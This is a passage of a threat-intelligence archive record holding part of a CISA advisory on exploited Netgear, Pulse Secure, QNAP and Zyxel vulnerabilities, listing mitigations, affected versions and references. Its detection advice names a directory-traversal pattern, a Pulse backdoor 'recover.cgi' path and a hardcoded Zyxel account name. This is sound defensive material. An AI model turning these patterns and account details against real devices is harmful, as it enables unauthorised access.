overflow through specialized\r\nparameters.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following products:\r\nWNR2000v3 before version 1.1.2.14\r\nWNR2000v4 before version 1.0.0.66\r\nWNR2000v5 before version 1.0.0.42\r\nR2000\r\nReferences \r\nhttps://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261\r\nhttps://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf\r\nhttp://www.securityfocus.com/bid/98740\r\nTable 11: Information on Pulse CVE-2019-11510\r\n                                              Pulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)\r\nVulnerability Description \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 12 of 17\n\nPulse CVE-2019-11510                   CVSS 3.0: 10 (Critical)\r\nIn Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an\r\nunauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability. \r\nRecommended Mitigations \r\nUpgrade to the latest Pulse Secure VPN.\r\nStay alert to any scheduled tasks or unknown files/executables.\r\nCreate detection/protection mechanisms that respond on directory traversal (/../../../) attempts to read local system\r\nfiles.\r\nDetection Methods \r\nCISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.\r\nNmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following Pulse Connect Secure products:\r\n9.0R1 to 9.0R3.3\r\n8.3R1 to 8.3R7\r\n8.2R1 to 8.2R12\r\nReferences \r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/\r\nTable 12: Information on Pulse CVE-2021-22893\r\n                                               Pulse CVE-2021-22893              CVSS 3.0: 10 (Critical)\r\nVulnerability Description \r\nPulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the\r\nWindows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an\r\nunauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This\r\nvulnerability has been exploited in the wild.\r\nRecommended Mitigations\r\nUpdating such systems to PCS 9.1R11.4.\r\nRun the PCS Integrity Assurance utility.\r\nEnable Unauthenticated Request logging.\r\nEnable remote logging.\r\nPulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other\r\nvulnerabilities.\r\nMonitor capabilities in open source scanners. \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 13 of 17\n\nPulse CVE-2021-22893              CVSS 3.0: 10 (Critical)\r\nDetection Methods \r\nLog correlation between the authentication servers responsible for LDAP and RADIUS authentication and the\r\nVPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing\r\nsuccess would be an anomalous event worthy of flagging.\r\nThe Pulse Security Check Tool.\r\nA ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=\u003cvaries\u003e.\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.\r\nReferences \r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/\r\nhttps://blog.pulsesecure.net/pulse-connect-secure-security-update/\r\nhttps://kb.cert.org/vuls/id/213092\r\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/\r\nhttps://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html\r\nTable 13: Information on QNAP CVE-2019-7192\r\n                                                  QNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix\r\nthese vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later \r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 14 of 17\n\nQNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)\r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 14: Information on QNAP CVE- 2019-7193\r\n                                                QNAP CVE-2019-7193                  CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the\r\nvulnerability, QNAP recommend updating QTS to their latest versions.\r\nRecommended Mitigations \r\nUpdate QTS to versions: \r\nQTS 4.4.1 build 20190918 and later\r\nQTS 4.3.6 build 20190919 and later\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 15: Information on QNAP CVE-2019-7194\r\n                                               QNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description\r\nThis external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix\r\nthe vulnerability, QNAP recommend updating Photo Station to their latest versions.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 15 of 17\n\nQNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25 \r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 16: Information on QNAP CVE-2019-7195\r\n                                             QNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nThis external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix\r\nthe vulnerability, QNAP recommend updating Photo Station to their latest versions.\r\nRecommended Mitigations \r\nUpdate Photo Station to versions: \r\nQTS 4.4.1 Photo Station 6.0.3 and later\r\nQTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later\r\nQTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later\r\nQTS 4.2.6 Photo Station 5.2.11 and later\r\nDetection Methods \r\nN/A\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.\r\nReferences \r\nhttps://www.qnap.com/zh-tw/security-advisory/nas-201911-25\r\nhttp://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html\r\nTable 17: Information on Zyxel CVE-2020-29583\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 16 of 17\n\nZyxel CVE-2020-29583            CVSS 3.0: 9.8 (Critical)\r\nVulnerability Description \r\nFirmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable\r\npassword. The password for this account can be found in cleartext in the firmware. This account can be used by\r\nsomeone to login to the SSH server or web interface with admin privileges.\r\nRecommended Mitigations \r\nDownload latest patch (4.60 Patch1 or newer)\r\nDetection Methods \r\nLogin attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems\r\nVulnerable Technologies and Versions \r\nThis vulnerability affects the following technologies and versions:\r\nATP series running firmware ZLD V4.60\r\nUSG series running firmware ZLD V4.60\r\nUSG FLEX series running firmware ZLD V4.60\r\nVPN series running firmware ZLD V4.60\r\nNXC2500 running firmware V6.00 through V6.10\r\nNXC5500 running firmware V6.00 through V6.10\r\nReferences \r\nhttp://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf\r\nhttps://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release\r\nhttps://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15\r\nhttps://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html\r\nhttps://www.zyxel.com/support/CVE-2020-29583.shtml\r\nhttps://www.zyxel.com/support/security_advisories.shtml\r\nRevisions\r\nInitial Version: June 7, 2022\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-158a"
	],
	"report_names": [
		"aa22-158a"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434809,
	"ts_updated_at": 1775826721,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.pdf",
		"text": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.txt",
		"img": "https://archive.orkl.eu/a0f19efc809a407c598cf6c6396dc210d1a00f72.jpg"
	}
}